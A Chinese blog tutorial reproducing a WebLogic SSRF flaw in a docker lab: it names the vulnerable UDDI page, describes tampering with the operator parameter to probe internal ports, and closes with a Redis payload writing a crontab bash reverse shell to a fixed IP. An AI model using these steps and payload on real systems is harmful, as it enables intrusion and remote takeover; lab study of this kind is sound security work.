如何实现Weblogic SSRF漏洞复现

发布时间:2022-01-17 19:04:21 作者:柒染
来源:亿速云 阅读:409

今天就跟大家聊聊有关如何实现Weblogic SSRF漏洞复现,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

一、使用docker搭建环境

docker安装及搭建环境教程:https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

访问7001端口如何实现Weblogic SSRF漏洞复现

二、漏洞复现步骤

1、漏洞存在页面 /uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2、检查一下IBM这个地方看看

如何实现Weblogic SSRF漏洞复现

发现是个连接,这就可能存在ssrf了

3、使用burp suite抓包,点击Search

如何实现Weblogic SSRF漏洞复现

如何实现Weblogic SSRF漏洞复现

4、修改operator参数的连接

如何实现Weblogic SSRF漏洞复现

5、访问结果

访问不存在的端口返回 could not connect over HTTP

如何实现Weblogic SSRF漏洞复现

访问存在的端口返回状态码

如何实现Weblogic SSRF漏洞复现

访问内网

如何实现Weblogic SSRF漏洞复现

利用redis反弹shell的payload

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

看完上述内容,你们对如何实现Weblogic SSRF漏洞复现有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注亿速云行业资讯频道,感谢大家的支持。

推荐阅读:
  1. 怎么实现Exchange SSRF漏洞CVE-2021-26855的分析
  2. 怎么实现weblogic未授权命令执行漏洞复现

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

ssrf weblogic

上一篇:如何分析Web渗透信息

下一篇:python内置函数zip该如何理解

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》